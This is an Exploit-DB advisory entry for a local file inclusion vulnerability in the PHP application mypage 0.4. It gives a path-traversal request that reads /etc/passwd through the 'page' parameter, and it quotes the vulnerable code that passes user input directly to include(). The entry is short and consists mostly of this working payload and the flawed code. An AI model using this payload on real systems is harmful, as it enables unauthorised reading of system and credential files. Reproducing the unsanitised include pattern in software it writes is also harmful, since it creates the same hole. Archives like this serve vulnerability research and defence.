mypage 0.4 - Local File Inclusion

EDB-ID:

10600

CVE:

N/A


Author:

BAYBORA

Type:

webapps


Platform:

PHP

Date:

2009-12-22


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#############################################################
# mypage0.4 LFI Vulnerability

# Author: BAYBORA

# Site: www.1923turk.biz<http://www.1923turk.biz>

##############################################################

# Exploit:


Vuln file: index.php?page=LFI


Exploit:


POST http://server/index.php?page=../../../../../../../../etc/passwd

index.php

if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}